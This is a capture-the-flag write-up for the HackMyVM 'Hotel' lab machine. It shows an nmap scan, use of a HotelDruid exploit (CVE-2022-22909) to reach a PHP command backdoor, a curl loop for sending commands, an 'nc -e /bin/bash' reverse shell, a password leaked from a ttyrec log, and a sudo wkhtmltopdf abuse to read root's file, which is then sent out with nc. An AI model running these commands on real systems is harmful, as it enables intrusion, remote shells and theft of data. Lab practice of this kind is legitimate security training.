NOTES ABOUT Hotel

[ 2022-10-10 ] [ HackMyVM / Hotel ]

Status: Rooted
Skills: Port Scanning, PHP Backdoor, RCE, Reverse Shell, ttyrec
Tools: nmap, nc, ttyrec, wkhtmltopdf

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.27

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 06:1f:a2:25:19:45:2b:2f:44:cc:74:7a:e2:9b:ab:ac (RSA)
|   256 6f:b9:da:fb:eb:6b:4c:de:33:63:b7:ce:f0:2f:f7:cd (ECDSA)
|_  256 84:fb:1d:5c:4c:c6:60:e8:47:d8:2f:a0:92:8e:fb:18 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title:  Hoteldruid 
|_http-server-header: nginx/1.18.0

GETTING IN

DRUID HOTEL EXPLOIT: [CVE-2022-22909]

$ python3 exploit.py -t http://10.0.2.27 --noauth

[...]
[+] Code executed successfully, Go to http://10.0.2.27/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://10.0.2.27/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)

cmd.sh

#!/bin/bash

Url=$1
Param=$2
echo "Payload: $Url?$Param="
while :
do
        read -p "Cmd: " cmd
        curl $Url --data-urlencode "$Param=$cmd"
done

$ ./cmd.sh "http://10.0.2.27/dati/selectappartamenti.php" "cmd" 
Payload: http://10.0.2.27/dati/selectappartamenti.php?cmd=
Cmd: nc -e /bin/bash 10.0.2.15 80

ELEVATING PRIVILEGES

www-data@hotel:~/html$ find / -xdev -group 33 2>/dev/null
/var/www/html/ttylog
[...]


www-data@hotel:~/html$ find / -xdev -name "*tty*" 2>/dev/null
[...]
/usr/bin/ttytime
/usr/bin/ttyplay
/usr/bin/pkttyagent
/usr/bin/ttyrec
[...]
/usr/share/doc/ttyrec
[...]
/var/www/html/ttylog
www-data@hotel:~/html$ ttyplay < ttylog 

person@hotel:~$ my passw0rd is ****************

www-data@hotel:~/html$ exit

$ ssh person@10.0.2.27 
person@10.0.2.27\'s password: 

person@hotel:~$ cat user.txt
****************

ROOT FLAG:

sudo -l
Matching Defaults entries for person on hotel:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User person may run the following commands on hotel:
    (root) NOPASSWD: /usr/bin/wkhtmltopdf
person@hotel:~$ sudo -u root /usr/bin/wkhtmltopdf /root/root.txt ./output.pdf
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
Printing pages (2/2)
Done 
person@hotel:~$ ls -la
[...]
-rw-r--r-- 1 root   root   7617 oct 10 21:28 output.pdf
[...]

person@hotel:~$ nc 10.0.2.15 80 < output.pdf

ROOT FLAG: ****************

--- Loaded 443 times ---